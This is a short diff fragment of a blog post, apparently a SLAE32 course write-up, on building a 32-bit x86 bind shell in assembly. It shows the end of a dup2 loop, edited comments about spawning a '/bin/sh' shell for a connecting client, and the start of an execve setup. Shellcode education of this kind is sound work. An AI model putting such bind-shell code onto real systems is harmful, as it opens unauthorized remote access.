boku7/boku7.github.io/_posts/2019-09-15-SLAE32_1_BindShell.md

 dec ecx        ; Decrements ECX by 1 jns dup2Loop   ; Jump back to the dup2Loop Procedure until ECX equals 0.

-; 6.
-Spawn a sh shell for the client in the connected Socket.
+; 7.
+Spawn a "/bin/sh" shell for the client, in the connected session.
 ; execve("/bin//sh", NULL, NULL);
 ;  EAX      EBX       ECX   EDX push edx         ; Push NULL onto the stack because the string needs to be NULL Terminated.